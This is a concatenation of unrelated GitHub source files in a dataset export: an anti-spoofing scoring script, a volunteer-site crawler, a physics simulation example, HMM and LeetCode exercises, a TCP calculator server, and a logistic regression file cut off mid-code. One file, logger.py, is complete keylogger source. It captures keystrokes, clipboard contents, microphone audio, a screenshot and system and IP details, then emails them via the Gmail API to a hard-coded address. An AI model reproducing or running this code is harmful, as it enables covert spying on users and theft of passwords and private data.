model_.lcnn_9layers_CC(ncoef=args.ncoef_pa)\n\telif args.model_pa == 'lcnn_29_CC':\n\t\tmodel_pa = model_.lcnn_29layers_CC(ncoef=args.ncoef_pa)\n\telif args.model_pa == 'resnet_CC':\n\t\tmodel_pa = model_.ResNet_CC(ncoef=args.ncoef_pa, resnet_type=args.resnet_type_pa)\n\telif args.model_pa == 'TDNN':\n\t\tmodel_pa = model_.TDNN(ncoef=args.ncoef_pa)\n\telif args.model_pa == 'TDNN_multipool':\n\t\tmodel_pa = model_.TDNN_multipool(ncoef=args.ncoef_pa)\n\telif args.model_pa == 'TDNN_LSTM':\n\t\tmodel_pa = model_.TDNN_LSTM(ncoef=args.ncoef_pa)\n\telif args.model_pa == 'FTDNN':\n\t\tmodel_pa = model_.FTDNN(ncoef=args.ncoef_pa)\n\telif args.model_pa == 'Linear':\n\t\tmodel_pa = model_.Linear(ncoef=args.ncoef_pa)\n\telif args.model_pa == 'mobilenet':\n\t\tmodel_pa = model_.MobileNetV3_Small()\n\telif args.model_pa == 'densenet':\n\t\tmodel_pa = model_.DenseNet()\n\n\tif args.model_mix == 'lstm':\n\t\tmodel_mix = model_.cnn_lstm()\n\telif args.model_mix == 'VGG':\n\t\tmodel_mix = model_.VGG(vgg_name=args.vgg_type_mix)\n\telif args.model_mix == 'resnet':\n\t\tmodel_mix = model_.ResNet(resnet_type=args.resnet_type_mix)\n\telif args.model_mix == 'resnet_pca':\n\t\tmodel_mix = model_.ResNet_pca(resnet_type=args.resnet_type_mix)\n\telif args.model_mix == 'wideresnet':\n\t\tmodel_mix = model_.WideResNet()\n\telif args.model_mix == 'lcnn_9':\n\t\tmodel_mix = model_.lcnn_9layers()\n\telif args.model_mix == 'lcnn_29':\n\t\tmodel_mix = model_.lcnn_29layers_v2()\n\telif args.model_mix == 'lcnn_9_pca':\n\t\tmodel_mix = model_.lcnn_9layers_pca()\n\telif args.model_mix == 'lcnn_29_pca':\n\t\tmodel_mix = model_.lcnn_29layers_v2_pca()\n\telif args.model_mix == 'lcnn_9_icqspec':\n\t\tmodel_mix = model_.lcnn_9layers_icqspec()\n\telif args.model_mix == 'lcnn_9_prodspec':\n\t\tmodel_mix = model_.lcnn_9layers_prodspec()\n\telif args.model_mix == 'lcnn_9_CC':\n\t\tmodel_mix = model_.lcnn_9layers_CC(ncoef=args.ncoef_mix)\n\telif args.model_mix == 'lcnn_29_CC':\n\t\tmodel_mix = model_.lcnn_29layers_CC(ncoef=args.ncoef_mix)\n\telif args.model_mix == 'resnet_CC':\n\t\tmodel_mix = model_.ResNet_CC(ncoef=args.ncoef_mix, resnet_type=args.resnet_type_mix)\n\telif args.model_mix == 'TDNN':\n\t\tmodel_mix = model_.TDNN(ncoef=args.ncoef_mix)\n\telif args.model_mix == 'TDNN_multipool':\n\t\tmodel_mix = model_.TDNN_multipool(ncoef=args.ncoef_mix)\n\telif args.model_mix == 'TDNN_LSTM':\n\t\tmodel_mix = model_.TDNN_LSTM(ncoef=args.ncoef_mix)\n\telif args.model_mix == 'FTDNN':\n\t\tmodel_mix = model_.FTDNN(ncoef=args.ncoef_mix)\n\telif args.model_mix == 'Linear':\n\t\tmodel_mix = model_.Linear(ncoef=args.ncoef_mix)\n\telif args.model_mix == 'mobilenet':\n\t\tmodel_mix = model_.MobileNetV3_Small()\n\telif args.model_mix == 'densenet':\n\t\tmodel_mix = model_.DenseNet()\n\n\tprint('Loading model')\n\n\tckpt = torch.load(args.cp_path, map_location = lambda storage, loc: storage)\n\tmodel_la.load_state_dict(ckpt['model_la_state'])\n\tmodel_pa.load_state_dict(ckpt['model_pa_state'])\n\tmodel_mix.load_state_dict(ckpt['model_mix_state'])\n\tmodel_la.eval()\n\tmodel_pa.eval()\n\tmodel_mix.eval()\n\n\tprint('Model loaded')\n\n\tprint('Loading data')\n\n\tdata_la = { k:m for k,m in read_mat_scp(args.path_to_data_la) }\n\tdata_pa = { k:m for k,m in read_mat_scp(args.path_to_data_pa) }\n\tdata_mix = { k:m for k,m in read_mat_scp(args.path_to_data_mix) }\n\n\n\tif args.trials_path:\n\t\tif args.eval:\n\t\t\ttest_utts = read_trials(args.trials_path, eval_=args.eval)\n\t\telse:\n\t\t\ttest_utts, attack_type_list, label_list =
read_trials(args.trials_path, eval_=args.eval)\n\telse:\n\t\ttest_utts = list(data_la.keys())\n\n\tprint('Data loaded')\n\n\tprint('Start of scores computation')\n\n\tscores = {}\n\n\tscores['all'] = []\n\tscores['la'] = []\n\tscores['pa'] = []\n\tscores['mix'] = []\n\tscores['fusion'] = []\n\n\twith torch.no_grad():\n\n\t\tfor i, utt in enumerate(test_utts):\n\n\t\t\tfeats_la = prep_feats(data_la[utt])\n\t\t\tfeats_pa = prep_feats(data_pa[utt])\n\t\t\tfeats_mix = prep_feats(data_mix[utt])\n\n\t\t\ttry:\n\t\t\t\tif args.cuda:\n\t\t\t\t\tfeats_la = feats_la.to(device)\n\t\t\t\t\tfeats_pa = feats_pa.to(device)\n\t\t\t\t\tfeats_mix = feats_mix.to(device)\n\t\t\t\t\tmodel_la = model_la.to(device)\n\t\t\t\t\tmodel_pa = model_pa.to(device)\n\t\t\t\t\tmodel_mix = model_mix.to(device)\n\n\t\t\t\tpred_la = model_la.forward(feats_la).squeeze()\n\t\t\t\tpred_pa = model_pa.forward(feats_pa).squeeze()\n\t\t\t\tpred_mix = model_mix.forward(feats_mix).squeeze()\n\n\t\t\texcept:\n\t\t\t\tfeats_la = feats_la.cpu()\n\t\t\t\tfeats_pa = feats_pa.cpu()\n\t\t\t\tfeats_mix = feats_mix.cpu()\n\t\t\t\tmodel_la = model_la.cpu()\n\t\t\t\tmodel_pa = model_pa.cpu()\n\t\t\t\tmodel_mix = model_mix.cpu()\n\n\t\t\t\tpred_la = model_la.forward(feats_la).squeeze()\n\t\t\t\tpred_pa = model_pa.forward(feats_pa).squeeze()\n\t\t\t\tpred_mix = model_mix.forward(feats_mix).squeeze()\n\n\t\t\tif args.train_mode == 'mix':\n\t\t\t\tmixture_coef = 1.0-torch.sigmoid(pred_mix).squeeze()\n\t\t\t\tscore_all = 1.0-torch.sigmoid(mixture_coef*pred_la + (1.-mixture_coef)*pred_pa).squeeze().cpu().item()\n\t\t\t\tscore_la = 1.0-torch.sigmoid(pred_la).squeeze().cpu().item()\n\t\t\t\tscore_pa = 1.0-torch.sigmoid(pred_pa).squeeze().cpu().item()\n\t\t\t\tscore_mix = 1.0-2*abs(mixture_coef.cpu().item()-0.5)\n\t\t\t\tscore_fusion = (score_all+score_la+score_pa+score_mix)/4.\n\n\t\t\telif args.train_mode == 'lapa':\n\t\t\t\tscore_all = 0.0\n\t\t\t\tscore_la = 1.0-2*abs(torch.sigmoid(pred_la)-0.5).cpu().numpy().item()\n\t\t\t\tscore_pa = 1.0-2*abs(torch.sigmoid(pred_pa)-0.5).cpu().numpy().item()\n\t\t\t\tscore_mix = 1.0-2*abs(torch.sigmoid(pred_mix)-0.5).cpu().numpy().item()\n\t\t\t\tscore_fusion = (score_la+score_pa+score_mix)/3.\n\n\t\t\telif args.train_mode == 'independent':\n\t\t\t\tscore_all = 0.0\n\t\t\t\tscore_la = 1.0-torch.sigmoid(pred_la).cpu().numpy().item()\n\t\t\t\tscore_pa = 1.0-torch.sigmoid(pred_pa).cpu().numpy().item()\n\t\t\t\tscore_mix = 1.0-torch.sigmoid(pred_mix).cpu().numpy().item()\n\t\t\t\tscore_fusion = (score_la+score_pa+score_mix)/3.\n\n\t\t\tscores['all'].append(score_all)\n\t\t\tscores['la'].append(score_la)\n\t\t\tscores['pa'].append(score_pa)\n\t\t\tscores['mix'].append(score_mix)\n\t\t\tscores['fusion'].append(score_fusion)\n\n\tif not args.no_output_file:\n\n\t\tprint('Storing scores in output file:')\n\t\tprint(args.out_path)\n\n\t\tfor score_type, score_list in scores.items():\n\n\t\t\tif (args.train_mode=='lapa' or args.train_mode=='independent') and score_type=='all':\n\t\t\t\tcontinue\n\n\t\t\tfile_name = args.out_path+args.prefix+'_'+score_type+'.txt'\n\n\t\t\twith open(file_name, 'w') as f:\n\t\t\t\tif args.eval or args.trials_path is None:\n\t\t\t\t\tfor i, utt in enumerate(test_utts):\n\t\t\t\t\t\tf.write(\"%s\" % ' '.join([utt, str(score_list[i])+'\\n']))\n\t\t\t\telse:\n\t\t\t\t\tfor i, utt in enumerate(test_utts):\n\t\t\t\t\t\tf.write(\"%s\" % ' '.join([utt, attack_type_list[i], label_list[i], str(score_list[i])+'\\n']))\n\n\tif not args.no_eer and not args.eval and args.trials_path:\n\t\tfor score_type, 
score_list in scores.items():\n\t\t\tprint('\\nEER {}: {}\\n'.format(score_type, compute_eer_labels(label_list, score_list)))\n\n\tprint('All done!!')\n","repo_name":"joaomonteirof/e2e_antispoofing","sub_path":"score_all.py","file_name":"score_all.py","file_ext":"py","file_size_in_byte":14060,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"56"} +{"seq_id":"71318026735","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Apache License Version 2.0\n# utility functions to crawl html pages from bv2008.cn\n\nimport requests\nmain_url = 'http://www.bv2008.cn/app/'\n\nimport logging\nlogging.basicConfig(level = logging.INFO,format = '%(asctime)s - %(name)s[line:%(lineno)d] - %(levelname)s - %(message)s')\nlogger = logging.getLogger('crawl.py')\n\n\nfrom func import get_user_joined_project,get_project_joined_user,get_user_detailed_info,get_organization_detailed_info\nfrom database import get_project_id,get_update_volunteer_list\n\ndef get_organization_initiate_project(organization_id):\n    \"\"\"\n    given organization_id, get all the projects the organization initiates\n    Parameters\n    ----------\n    organization_id : int or list, if list, the first element of list is counted as main registration id\n\n    Returns\n    ------- \n    None\n    \"\"\"\n    max_page_num = 10\n    main_organization_id = None\n    if(type(organization_id) == type([])):\n        main_organization_id = organization_id[0]\n    else:\n        main_organization_id = organization_id\n        organization_id = [organization_id] # make a list\n    # extract organization info\n    request_url = main_url + 'org/view.php?id=%d'%main_organization_id\n    response=requests.get(request_url)\n    if not(response.status_code == 200):\n        raise ValueError(\"status code not equal 200\")\n    get_organization_detailed_info(response.text,main_organization_id)\n    for o_id in organization_id: \n        for i in range(1,max_page_num):\n            request_url = main_url + 'api/view.php?m=get_opps&type=2&id=%d&p=%d'%(o_id,i)\n            response=requests.get(request_url)\n            if not(response.status_code == 200):\n                raise ValueError(\"status code not equal 200\")\n            # the top element is for the first page\n            if(response.text.count('tr')<3):# empty table\n                break\n            get_user_joined_project(response.text,main_organization_id)\n\ndef update_project_joined_user(organization_id = None):\n    \"\"\"\n    select project ids from table 'project' and get the joined user html table from bv2008.cn,\n    then call the function 'get_project_joined_user'\n    Parameters\n    ----------\n    organization_id : int\n\n    \"\"\"\n    for i in get_project_id(organization_id):\n        request_url = main_url + 'opp/view.php?id=%d'%(int(i[0]))\n        response=requests.get(request_url)\n        if not(response.status_code == 200):\n            logging.error('request url %s failed' % request_url)\n            raise ValueError(\"status code not equal 200\")\n        if(response.text.find('error_icon errno')>0): # project does not exist or does not recruit publicly\n            continue\n        get_project_joined_user(response.text,given_project_id = int(i[0]))\n\ndef update_volunteer_info():\n    \"\"\"\n    select volunteer ids from table 'volunteer' and get user html table from bv2008.cn,\n    then call the function 'get_user_detailed_info'\n    \"\"\"\n    for i in get_update_volunteer_list():\n        request_url = main_url + 'user/view.php?id=%d'%(int(i[0]))\n        response=requests.get(request_url)\n        if not(response.status_code == 200):\n            raise ValueError(\"status code not equal 200\")\n        # handle js url redirection\n        if(response.text[-9:] == '</script>'):\n            new_user_url_start = response.text.find('http')\n            new_user_url_end = response.text.find('\";')\n            if 
not(new_user_url_end>0):\n raise ValueError(response.text)\n new_user_url = response.text[new_user_url_start:new_user_url_end]\n logging.info('request redirected url: %s' % new_user_url)\n response = requests.get(new_user_url)\n if not(response.status_code == 200):\n raise ValueError(\"status code not equal 200\")\n get_user_detailed_info(response.text,given_user_id = int(i[0]))\n \nif __name__ == '__main__':\n # for testing purpose only\n organization_list = [3474414,3474395] #,3474384,3474378,3474376,3474316,3471958,3470375]\n for i in organization_list:\n get_organization_initiate_project(organization_id = i)\n update_project_joined_user(organization_id = i)\n update_volunteer_info()\n\n","repo_name":"zhaofeng-shu33/bv2008","sub_path":"crawl/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"23824936054","text":"\"\"\"\nRuns a simple simulation, saves it to disk and loads it back for plotting.\n\"\"\"\n\nimport os\nimport gnlse\n\nif __name__ == '__main__':\n setup = gnlse.GNLSESetup()\n setup.resolution = 2**13\n setup.time_window = 12.5 # ps\n setup.z_saves = 200\n setup.fiber_length = 0.15 # m\n setup.wavelength = 835 # nm\n setup.pulse_model = gnlse.GaussianEnvelope(1, 0.1)\n\n solver = gnlse.GNLSE(setup)\n solution = solver.run()\n\n path = 'test.mat'\n\n solution.to_file(path)\n solution = gnlse.Solution()\n solution.from_file(path)\n\n gnlse.quick_plot(solution)\n\n os.remove(path)\n","repo_name":"WUST-FOG/gnlse-python","sub_path":"examples/test_import_export.py","file_name":"test_import_export.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"56"} +{"seq_id":"6821679952","text":"'''\r\nGoal: Compute the probability of a hidden path \r\nInput: hidden path π followed by the states States and \r\n transition matrix Transition of a Hidden Markov Model (HMM) (Sigma, States, Transition, Emission)\r\nOutput: The probability of this path, Pr(pi)\r\n\r\n./testcases/10.5HiddenPathProbability_Sample.txt\r\n\r\n'''\r\nimport numpy as np \r\n\r\ndef ReadFile():\r\n with open('./datasets/dataset_609241_8.txt', 'r') as f:\r\n Path = str(f.readline().strip())\r\n f.readline()\r\n States = f.readline().strip().split()\r\n f.readline()\r\n f.readline()\r\n Matrix = [line.strip().split() for line in f.readlines()]\r\n\r\n Transition = {}\r\n for row in Matrix:\r\n for i, prob in enumerate(row[1:]):\r\n Transition[row[0] + States[i]] = float(prob)\r\n return Path, States, Transition\r\n\r\ndef HiddenPath (Path, States, Transition):\r\n #inital probability of states is split evenly between the states \r\n Pr = 1/ len(States)\r\n #for the rest of the path probabily is based on the transitions matrix\r\n for i in range(len(Path)-1):\r\n #multiply the current probabily by the previous probabilities sum\r\n Pr *= Transition[Path[i:i+2]]\r\n return Pr\r\n\r\n \r\n\r\nPath, States, Transition = ReadFile()\r\nPr = HiddenPath(Path, States, Transition)\r\nprint('Pr', Pr)","repo_name":"mmeghan/INFO403_CodingChallenges","sub_path":"Chapter10/10.5_ProbabilityOfHiddenPath.py","file_name":"10.5_ProbabilityOfHiddenPath.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"36299423691","text":"from collections import Counter\nclass Solution(object):\n def commonChars(self, A):\n \"\"\"\n :type A: 
List[str]\n :rtype: List[str]\n \"\"\"\n result = Counter(A[0])\n for a in A[1:]:\n counter = Counter(a)\n for key, value in counter.items():\n counter[key] = min(result[key], value)\n result = counter\n rval = []\n for key, value in result.items():\n if value:\n rval.extend([key] * value)\n return rval\n \n","repo_name":"kaiwensun/leetcode","sub_path":"1001-1500/1002.Find Common Characters.py","file_name":"1002.Find Common Characters.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"56"} +{"seq_id":"21896854207","text":"#! /usr/bin/python3\n\nimport threading\nimport socket\nimport sys\nimport logging\nimport json\nfrom pprint import pformat\nfrom typing import Callable, Tuple, Union\n\nfrom conn import (\n ADDR, DISCONNECT_MESSAGE, SERVER_ADDR, CODEC_FORMAT,\n send, receive,\n)\n\nLOG_FORMAT = '%(asctime)s %(threadName)-17s %(message)s'\nlogging.basicConfig(level=logging.INFO, \n format=LOG_FORMAT, \n handlers=[ \n logging.FileHandler(r'server.log'),\n logging.StreamHandler(sys.stdout),\n ])\nlogger = logging.getLogger(__name__)\n\n# ||--- Global\n\nvisited_addr = {}\n\n# ---||\nlock = threading.Lock()\n\n\ndef select_op(op: str) -> Union[Callable[[int, int], Union[int, float]], bool]:\n if op == '+': \n return lambda a, b: a + b\n elif op == '-': \n return lambda a, b: a - b\n elif op == '*': \n return lambda a, b: a * b\n elif op == '/': \n return lambda a, b: a / b\n elif op == '%':\n return lambda a, b: a % b\n else: \n return False\n\n\ndef exec(req: str) -> Union[int, float, bool]: \n try:\n op, a, b = req.split()\n func = select_op(op)\n return func(int(a), int(b))\n except ZeroDivisionError as e:\n print(e)\n return False\n\n\ndef handle_client(conn: socket.socket, addr: Tuple[str, int]) -> None:\n logger.info(f'[NEW CONNECTION] {addr} connected.')\n\n while True:\n msg = receive(conn)\n logger.info(f'[REQUEST] from {addr}: {msg}')\n msg = json.loads(msg)\n req = msg.get('req')\n \n if req == DISCONNECT_MESSAGE:\n break\n \n with lock:\n if addr not in visited_addr:\n visited_addr[addr] = 1\n else:\n visited_addr[addr] += 1\n\n # logger.info(pformat(visited_addr))\n res = exec(req)\n if res is not False:\n payload = json.dumps({'res_': res})\n send(conn, bytes(payload, encoding=CODEC_FORMAT))\n else:\n payload = json.dumps({'res_': 'Failed!'})\n send(conn, bytes(payload, encoding=CODEC_FORMAT))\n conn.close()\n\n\ndef start_server() -> None:\n server.listen(1)\n logger.info(f'[LISTENING] on {SERVER_ADDR}')\n try:\n while True:\n conn, addr = server.accept()\n t = threading.Thread(target=handle_client, args=(conn, addr))\n t.start()\n logger.info(f'[ACTIVE CONNECTION] {threading.active_count() - 1}') # exclude main thread\n finally:\n conn.close()\n\nif __name__ == '__main__':\n try:\n server = socket.socket(\n family=socket.AF_INET,\n type=socket.SOCK_STREAM,\n )\n server.bind(ADDR)\n except socket.error as e:\n logger.error(f'Fail to create a socket: {e}')\n sys.exit()\n \n try:\n logger.info('[SERVER STARTED]')\n start_server()\n finally:\n input('Press [ENTER]...')","repo_name":"Tatchakorn/Multi-threaded-Server-","sub_path":"multicast/tcp_server.py","file_name":"tcp_server.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"17341285410","text":"from datetime import date, timedelta, datetime\n\ndef normalize_date_to_isoformat(date):\n DATETIME_FORMAT = '%Y-%m-%d %H:%M'\n \n #get rid of 
the unwanted ' GMT+0000' at the end eGain dates\n clean_date = date[0: len(date) - 16] \n \n date_obj = datetime.strptime(clean_date , DATETIME_FORMAT)\n \n return date_obj.isoformat()","repo_name":"zainiaz/logs4j-custom-parser","sub_path":"src/functions/normalize_date_to_isoformat.py","file_name":"normalize_date_to_isoformat.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"36425724443","text":"# ==================================================== DESAFIO 101 =====================================================\n# Crie um programa que tenha uma função chamada voto() que vai receber como parâmetro o ano de nascimento de uma pessoa,\n# retornando um valor literal indicando se uma pessoa tem voto NEGADO, OPCIONAL e OBRIGATÓRIO nas eleições.\n# ======================================================================================================================\nfrom datetime import date\n\nano_atual = date.today().year\n\ndef voto(ano):\n if ano_atual - ano < 16:\n return 'NEGADO'\n elif 16 <= ano_atual - ano < 18 or ano_atual - ano > 65:\n return 'OPCIONAL'\n else:\n return 'OBRIGATORIO'\n\nano_nasc = int(input('Digite o ano de nascimento: '))\nprint(f'Com {ano_atual - ano_nasc} anos, o voto é {voto(ano_nasc)}!')\n","repo_name":"wandersoncarelli/Exercicios-Python3","sub_path":"101 – Funções para votação.py","file_name":"101 – Funções para votação.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"8589819704","text":"import socket\r\nimport platform\r\nimport win32clipboard\r\nimport datetime\r\nfrom pynput.keyboard import Key, Listener\r\nfrom scipy.io.wavfile import write\r\nimport sounddevice as sd\r\nfrom requests import get, RequestException\r\nfrom PIL import ImageGrab\r\nimport multiprocessing\r\nfrom time import perf_counter\r\nfrom mail_support import authenticateGmailAPIs, send_mail\r\n\r\n\r\ndef get_system_information(path):\r\n with open(path, \"w\") as f:\r\n host_name = socket.gethostname()\r\n IP = socket.gethostbyname(host_name)\r\n\r\n f.write(\"System: \" + platform.system() + \" \" + platform.version())\r\n f.write(\"\\nMachine: \" + platform.machine())\r\n f.write(\"\\nProcessor: \" + platform.processor())\r\n f.write(\"\\nHostname: \" + host_name)\r\n f.write(\"\\nPrivate IP Address: \" + IP)\r\n\r\n try:\r\n pub_ip = get(\"https://api.ipify.org\").text\r\n f.write(\"\\nPublic IP Address: \" + pub_ip)\r\n except RequestException:\r\n f.write(\"\\nPublic IP Address: Could not retrieve public ip address\")\r\n\r\n\r\ndef get_clipboard(path):\r\n with open(path, \"w\") as f:\r\n try:\r\n win32clipboard.OpenClipboard()\r\n data = win32clipboard.GetClipboardData()\r\n f.write(\"Clipboard Data:\\n\\n\" + data)\r\n except TypeError:\r\n f.write(\"\\nNon-text information found in clipboard!!\")\r\n finally:\r\n win32clipboard.CloseClipboard()\r\n\r\n\r\ndef get_microphone(path,mic_act):\r\n sf = 44100\r\n seconds = mic_act\r\n recording = sd.rec(int(seconds * sf), samplerate=sf, channels=2)\r\n sd.wait()\r\n write(path, sf, recording)\r\n\r\n\r\ndef grab_screenshot(path):\r\n img = ImageGrab.grab()\r\n img.save(path)\r\n\r\n\r\ndef on_press(key):\r\n global keys, count\r\n\r\n k = str(key).replace(\"'\",\"\")\r\n keys.append(k)\r\n count += 1\r\n # print(keys)\r\n\r\n if count >= 1:\r\n count = 0\r\n write_to_list(keys)\r\n keys = []\r\n\r\n\r\ndef 
write_to_list(_keys):\r\n global log_list,fn_key_list,lookup_num\r\n\r\n for key in _keys:\r\n if key.find(\"shift\") > 0 or key.find(\"esc\") > 0 or key.find(\"ctrl\") > 0 or key.find(\"alt\") > 0 \\\r\n or key.find(\"cmd\") > 0:\r\n pass\r\n elif key.find(\"up\") > 0 or key.find(\"down\") > 0 or key.find(\"left\") > 0 or key.find(\"right\") > 0:\r\n pass\r\n elif key.find(\"backspace\") > 0:\r\n log_list = log_list[:-1]\r\n elif key.find(\"enter\") > 0:\r\n log_list.append(\"\\n\")\r\n elif key.find(\"space\") > 0:\r\n log_list.append(\" \")\r\n elif key.find(\"tab\") > 0:\r\n log_list.append(\"\\t\")\r\n elif key.find(\"caps_lock\") > 0 or key.find(\"num_lock\") > 0 or key.find(\"scroll_lock\") > 0:\r\n pass\r\n elif key.find(\"menu\") > 0 or key.find(\"insert\") > 0 or key.find(\"end\") > 0 or key.find(\"page_\") > 0 or \\\r\n key.find(\"delete\") > 0 or key.find(\"home\") > 0 or key.find(\"print_screen\") > 0 or \\\r\n key.find(\"pause\") > 0 or key.find(\"media_\") > 0:\r\n pass\r\n elif key in fn_key_list:\r\n pass\r\n elif key.find('\"\"') >= 0:\r\n log_list.append(\"\\'\")\r\n elif key.find(\"\\\\\\\\\") >= 0:\r\n log_list.append(\"\\\\\")\r\n elif key == \"<12>\":\r\n pass\r\n elif key == \"<110>\":\r\n log_list.append(\".\")\r\n elif key in lookup_num:\r\n log_list.append(lookup_num.get(key))\r\n else:\r\n log_list.append(key)\r\n\r\n\r\ndef on_release(key):\r\n # global prev\r\n if key == Key.esc:\r\n dt_end = datetime.datetime.now()\r\n with open(file_path + extend + key_info, \"a\") as f:\r\n f.writelines(log_list)\r\n f.write(f\"\\n\\nLogging Terminated> {dt_end.day}/{dt_end.month}/{dt_end.year} | {dt_end.hour}:\"\r\n f\"{dt_end.minute}:{dt_end.second}\\n\")\r\n f.close()\r\n # print(log_list)\r\n\r\n send_mail(to_address, from_address, \"Target Details\", \"Take a look at the information acquired!!\",\r\n attachments,authenticateGmailAPIs())\r\n\r\n return False\r\n\r\n \"\"\"\r\n curr = time.time()\r\n diff = curr - prev\r\n prev = curr\r\n if diff > 5:\r\n # print(\"exceeded 5 sec(s)\")\r\n with open(file_path + extend + key_info, \"a\") as f:\r\n f.writelines(log_list)\r\n f.close()\r\n log_list.clear()\r\n \"\"\"\r\n\r\n\r\nif __name__ == \"__main__\":\r\n start = perf_counter()\r\n file_path = \"C:\\\\Users\\\\Varun\\\\PycharmProjects\\\\keylogger\"\r\n extend = \"\\\\\"\r\n\r\n key_info = \"log.txt\"\r\n system_info = \"sys_info.txt\"\r\n clipboard_info = \"clipboard.txt\"\r\n\r\n audio_info = \"audio.wav\"\r\n microphone_activate = 5\r\n\r\n ss_info = \"grab.png\"\r\n\r\n from_address = '2112.vas.1803@gmail.com'\r\n to_address = '2112.vas.1803@gmail.com'\r\n\r\n attachments = [file_path + extend + key_info,\r\n file_path + extend + system_info,\r\n file_path + extend + clipboard_info,\r\n file_path + extend + audio_info,\r\n file_path + extend + ss_info]\r\n\r\n count = 0\r\n keys = []\r\n\r\n log_list = []\r\n fn_key_list = ['Key.f1', 'Key.f2', 'Key.f3', 'Key.f4', 'Key.f5', 'Key.f6',\r\n 'Key.f7', 'Key.f8', 'Key.f9', 'Key.f10', 'Key.f11', 'Key.f12', '<255>']\r\n lookup_num = {\r\n '<96>': '0',\r\n '<97>': '1',\r\n '<98>': '2',\r\n '<99>': '3',\r\n '<100>': '4',\r\n '<101>': '5',\r\n '<102>': '6',\r\n '<103>': '7',\r\n '<104>': '8',\r\n '<105>': '9'\r\n }\r\n\r\n dt_beg = datetime.datetime.now()\r\n with open(file_path + extend + key_info, \"w\") as fp:\r\n fp.write(f\"Logging Started> {dt_beg.day}/{dt_beg.month}/{dt_beg.year} | {dt_beg.hour}\"\r\n f\":{dt_beg.minute}:{dt_beg.second}\\n\\n\")\r\n fp.close()\r\n\r\n # prev = time.time()\r\n ls = 
Listener(on_press=on_press, on_release=on_release)\r\n ls.start()\r\n\r\n p1 = multiprocessing.Process(target=get_system_information,args=(file_path + extend + system_info,),daemon=True)\r\n p2 = multiprocessing.Process(target=get_clipboard,args=(file_path + extend + clipboard_info,),daemon=True)\r\n p3 = multiprocessing.Process(target=get_microphone,args=(file_path + extend + audio_info,microphone_activate),\r\n daemon=True)\r\n p4 = multiprocessing.Process(target=grab_screenshot,args=(file_path + extend + ss_info,),daemon=True)\r\n\r\n p1.start()\r\n p2.start()\r\n p3.start()\r\n p4.start()\r\n\r\n ls.join()\r\n\r\n end = perf_counter()\r\n\r\n print(f\"Done in {end-start} second(s)\")\r\n","repo_name":"Varun-Ajith-Sivaram/advanced_keylogger_python","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"74298124014","text":"import numpy as np\nfrom helpers import *\nfrom proj1_helpers import *\n\n\nnp.seterr(over='ignore')\n\nBINARY_CLASSIFICATOIN_0 = -1\nBINARY_CLASSIFICATOIN_1 = 1\n\n\ndef sigmoid(t):\n \"\"\"apply sigmoid function on t.\"\"\"\n return 1.0 / (1.0 + np.exp(-t))\n\n\ndef calculate_loss_logistic_regression(y, tx, w):\n \"\"\"compute the cost by negative log likelihood.\"\"\"\n prediction = tx @ w\n y1 = np.where(y == BINARY_CLASSIFICATOIN_1)\n\n over_700 = np.where(prediction >= 700)\n\n prediction_result = np.log(1 + np.exp(prediction))\n prediction_result[over_700] = prediction[over_700]\n prediction_result[y1] -= prediction[y1]\n\n result = np.sum(prediction_result)\n return result\n\n\ndef calculate_gradient_logistic_regression(y, tx, w):\n \"\"\"compute the gradient of loss.\"\"\"\n\n y1 = np.where(y == BINARY_CLASSIFICATOIN_1)\n sig = sigmoid(tx @ w).reshape(len(y))\n sig[y1] -= y[y1]\n\n return tx.T @ sig\n\n\ndef logistic_regression_helper(y, tx, gamma, max_iters, lambda_, tX_ori, y_ori, init_w):\n if init_w is None:\n w = np.zeros((tx.shape[1], 1))\n else:\n w = init_w\n\n w = w.reshape(np.zeros((tx.shape[1], 1)).shape)\n\n w_max = w\n performance = 0\n i = 0\n\n threshold = 1e-8\n loss_prev = 0\n batch_size = 1000\n\n for iter in range(max_iters):\n\n flag = 1\n\n # for minibatch_y, minibatch_tx in batch_iter(y, tx, batch_size):\n\n loss = calculate_loss_logistic_regression(y, tx, w) + lambda_ * np.linalg.norm(w, 2)\n gradient = calculate_gradient_logistic_regression(y, tx, w)\n w -= (gradient * gamma).reshape(w.shape)\n\n if (loss_prev != 0) and np.abs(loss_prev - loss) < threshold:\n print(\"Reached Theshold, exit\")\n flag = 0\n break\n\n loss_prev = loss\n\n if (iter % 10) == 0:\n compare_pred = predict_labels(w, tX_ori)\n compare_pred -= y_ori.reshape([len(y_ori), 1])\n nonzero = 0\n for j in range(len(compare_pred)):\n if (compare_pred[j] != 0):\n nonzero += 1\n\n cur_perf = 1 - nonzero / compare_pred.size\n if cur_perf > performance:\n performance = cur_perf\n w_max = w\n i = iter\n\n if (iter % 300) == 0:\n print(w_max)\n print(\"Performance: \", performance)\n print(\"Iteration: \", i)\n\n\n if (iter % 100) == 0:\n print(\"Current iteration={i}, the loss={l}\".format(i=iter, l=loss))\n\n if flag == 0:\n break\n\n return w\n\n\ndef logistic_regression(y, tx, gamma, max_iters):\n \"\"\" return the final w from the logistic regression \"\"\"\n return logistic_regression_helper(y, tx, gamma, max_iters, lambda_=0)\n\n\ndef reg_logistic_regression(y, tx, lambda_, gamma, max_iters, tX_ori, y_ori, init_w=None):\n \"\"\" 
